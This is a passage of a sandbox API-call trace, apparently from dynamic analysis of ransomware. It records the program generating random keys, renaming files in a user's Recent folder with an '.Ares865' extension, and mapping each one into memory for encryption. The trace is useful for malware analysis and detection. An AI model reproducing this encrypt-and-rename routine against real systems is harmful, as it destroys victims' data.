dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.186] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.186] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.188] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\E9z0m.lnk.Ares865") returned 54 [0093.188] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\E9z0m.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\e9z0m.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\E9z0m.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\e9z0m.lnk.ares865"), dwFlags=0x1) returned 1 [0093.189] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\E9z0m.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\e9z0m.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.190] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5132) returned 1 [0093.190] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.190] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.191] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.191] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1710, lpName=0x0) returned 0x15c [0093.191] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1710) returned 0x190000 [0093.191] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.192] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.192] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.193] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\EaPJ.lnk.Ares865") returned 53 [0093.193] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\EaPJ.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\eapj.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\EaPJ.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\eapj.lnk.ares865"), dwFlags=0x1) returned 1 [0093.194] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\EaPJ.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\eapj.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.194] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3428) returned 1 [0093.195] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.195] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.195] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.195] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1070, lpName=0x0) returned 0x15c [0093.196] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1070) returned 0x190000 [0093.196] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.197] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.197] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.198] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\ecAaAAeTG5m0hZZZ.lnk.Ares865") returned 65 [0093.198] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\ecAaAAeTG5m0hZZZ.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\ecaaaaetg5m0hzzz.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\ecAaAAeTG5m0hZZZ.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\ecaaaaetg5m0hzzz.lnk.ares865"), dwFlags=0x1) returned 1 [0093.199] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\ecAaAAeTG5m0hZZZ.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\ecaaaaetg5m0hzzz.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.200] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2681) returned 1 [0093.200] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.201] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.201] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.201] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xd80, lpName=0x0) returned 0x15c [0093.201] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xd80) returned 0x190000 [0093.201] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.202] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.202] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.203] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\eeoKkZRveFQ4qND0.lnk.Ares865") returned 65 [0093.203] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\eeoKkZRveFQ4qND0.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\eeokkzrvefq4qnd0.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\eeoKkZRveFQ4qND0.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\eeokkzrvefq4qnd0.lnk.ares865"), dwFlags=0x1) returned 1 [0093.204] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\eeoKkZRveFQ4qND0.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\eeokkzrvefq4qnd0.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.205] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5155) returned 1 [0093.205] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.205] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.205] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.206] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1730, lpName=0x0) returned 0x15c [0093.206] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1730) returned 0x190000 [0093.206] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.207] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.207] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.208] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\Ep4b.lnk.Ares865") returned 53 [0093.208] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\Ep4b.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\ep4b.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\Ep4b.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\ep4b.lnk.ares865"), dwFlags=0x1) returned 1 [0093.209] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\Ep4b.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\ep4b.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.209] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2538) returned 1 [0093.210] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.210] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.210] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.211] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xcf0, lpName=0x0) returned 0x15c [0093.211] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xcf0) returned 0x190000 [0093.211] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.211] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.212] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.213] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\etwmO4c1ImsF9psAO.lnk.Ares865") returned 66 [0093.213] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\etwmO4c1ImsF9psAO.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\etwmo4c1imsf9psao.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\etwmO4c1ImsF9psAO.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\etwmo4c1imsf9psao.lnk.ares865"), dwFlags=0x1) returned 1 [0093.214] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\etwmO4c1ImsF9psAO.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\etwmo4c1imsf9psao.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.215] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2692) returned 1 [0093.215] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.215] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.215] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.216] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xd90, lpName=0x0) returned 0x15c [0093.216] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xd90) returned 0x190000 [0093.216] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.217] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.217] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.218] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\F7w4O_tqKw.lnk.Ares865") returned 59 [0093.218] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\F7w4O_tqKw.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\f7w4o_tqkw.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\F7w4O_tqKw.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\f7w4o_tqkw.lnk.ares865"), dwFlags=0x1) returned 1 [0093.219] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\F7w4O_tqKw.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\f7w4o_tqkw.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.220] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2615) returned 1 [0093.220] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.220] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.221] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.221] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xd40, lpName=0x0) returned 0x15c [0093.221] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xd40) returned 0x190000 [0093.221] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.222] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.222] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.223] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\FIJvnN01Tnc96Wbx-V.lnk.Ares865") returned 67 [0093.223] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\FIJvnN01Tnc96Wbx-V.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\fijvnn01tnc96wbx-v.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\FIJvnN01Tnc96Wbx-V.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\fijvnn01tnc96wbx-v.lnk.ares865"), dwFlags=0x1) returned 1 [0093.224] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\FIJvnN01Tnc96Wbx-V.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\fijvnn01tnc96wbx-v.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.224] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3917) returned 1 [0093.225] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.225] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.225] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.226] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1250, lpName=0x0) returned 0x15c [0093.226] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1250) returned 0x190000 [0093.226] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.227] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.227] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.229] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\Fo93gd6JcbbXy S1 9Y.lnk.Ares865") returned 68 [0093.229] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\Fo93gd6JcbbXy S1 9Y.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\fo93gd6jcbbxy s1 9y.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\Fo93gd6JcbbXy S1 9Y.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\fo93gd6jcbbxy s1 9y.lnk.ares865"), dwFlags=0x1) returned 1 [0093.230] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\Fo93gd6JcbbXy S1 9Y.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\fo93gd6jcbbxy s1 9y.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.230] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2703) returned 1 [0093.230] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.231] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.231] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.231] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xd90, lpName=0x0) returned 0x15c [0093.232] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xd90) returned 0x190000 [0093.232] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.232] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.232] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.234] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\FUItO7Wqxmu39k8AB.lnk.Ares865") returned 66 [0093.234] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\FUItO7Wqxmu39k8AB.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\fuito7wqxmu39k8ab.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\FUItO7Wqxmu39k8AB.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\fuito7wqxmu39k8ab.lnk.ares865"), dwFlags=0x1) returned 1 [0093.235] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\FUItO7Wqxmu39k8AB.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\fuito7wqxmu39k8ab.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.235] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5166) returned 1 [0093.235] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.236] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.236] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.236] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1730, lpName=0x0) returned 0x15c [0093.236] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1730) returned 0x190000 [0093.237] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.237] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.237] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.239] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\gD95_POK9B3tJgm.lnk.Ares865") returned 64 [0093.239] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\gD95_POK9B3tJgm.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\gd95_pok9b3tjgm.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\gD95_POK9B3tJgm.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\gd95_pok9b3tjgm.lnk.ares865"), dwFlags=0x1) returned 1 [0093.240] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\gD95_POK9B3tJgm.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\gd95_pok9b3tjgm.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.240] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3826) returned 1 [0093.240] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.241] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.241] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.241] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1200, lpName=0x0) returned 0x15c [0093.241] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1200) returned 0x190000 [0093.242] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.243] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.243] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.244] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\gM d1iXlmcFz.lnk.Ares865") returned 61 [0093.244] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\gM d1iXlmcFz.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\gm d1ixlmcfz.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\gM d1iXlmcFz.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\gm d1ixlmcfz.lnk.ares865"), dwFlags=0x1) returned 1 [0093.245] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\gM d1iXlmcFz.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\gm d1ixlmcfz.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.246] GetFileSizeEx (in: hFile=0x118, 